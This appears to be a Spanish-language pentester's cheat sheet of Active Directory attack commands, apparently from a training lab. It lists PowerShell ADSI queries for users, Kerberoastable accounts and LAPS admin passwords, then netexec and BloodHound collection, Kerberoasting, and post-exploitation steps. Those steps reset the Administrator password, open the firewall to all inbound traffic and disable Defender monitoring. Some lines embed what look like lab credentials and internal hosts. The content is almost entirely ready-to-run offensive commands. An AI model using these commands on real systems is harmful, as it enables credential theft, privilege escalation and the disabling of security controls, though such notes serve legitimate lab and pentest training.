Enumeracion Local

$ExecutionContext.SessionState.LanguageMode

Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections

Enumeracion Remota

ADSI

# Get Current Domain
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Name
# Get-DomainUsers
([ADSISearcher]"(&(objectCategory=person)(objectClass=user)(sAMAccountName=*))").FindAll() | ForEach-Object { [PSCustomObject]@{Usuario = ($_.Properties.sAMAccountName -join ', '); Nombre = ($_.Properties.name -join ', '); Email = ($_.Properties.mail -join ', '); Desc = ($_.Properties.description -join ', ')}} | Format-Table -AutoSize
# Get-DomainUsers -SPN (Kerberostables)
([ADSISearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))").FindAll() | ForEach-Object { [PSCustomObject]@{Usuario = ($_.Properties['samaccountname'] | Select-Object -First 1); SPN = ($_.Properties['serviceprincipalname'] -join ', ')}} | Where-Object {$_.SPN} | Format-Table -AutoSize
# Get Computers
([ADSISearcher]"(&(objectCategory=computer)(sAMAccountName=*))").FindAll() | ForEach-Object { [PSCustomObject]@{Nombre = ($_.Properties.cn -join ', '); SAM = ($_.Properties.sAMAccountName -join ', '); OS = ($_.Properties.operatingsystem -join ', '); Desc = ($_.Properties.description -join ', ')}} | Format-Table -AutoSize
# Get LAPS passwords
([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { Write-Host "" ; $_.properties.cn ; $_.properties.'ms-mcs-admpwd'}

Bloodhound

netexec ldap 'IP' -u 'user' -p 'password' --bloodhound -c All --dns-server 'IP_DNS'

# CrossDomain (Importante tener el /etc/hosts correcto)
bloodhound-ce-python -u [email protected] -p '8_AxEwQaZjOGUb' -c all -d denkiair-prod.com -ns 172.16.180.102 -dc denkiair-prod.com --zip

LAPS

([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { Write-Host "" ; $_.properties.cn ; $_.properties.'ms-mcs-admpwd'}
netexec ldap 'IP' -u "USER" -H 'HASH' --module laps

Kerberoasting

# Usando creds
nxc ldap 172.16.180.102 -u 'alex.palmer' -p '8_AxEwQaZjOGUb' -d 'denkiair.com' --dns-server 172.16.238.102 --kerberoasting output.txt
# Usando TGT
nxc ldap 172.16.180.102 -k --use-kcache --kerberoasting output.txt

Generar Krb5.conf desde NetExec

netexec smb ip -u user -p password --generate-krb5-file /path
export KRB5_CONFIG=/path

PostExplotation

Disallow Restrictions

net user Administrator 'Alumne1234.'

New-NetFirewallRule -DisplayName "AllowAllIn" -Direction Inbound -Action Allow -Protocol Any

Set-MpPreference -DisableRealtimeMonitoring $true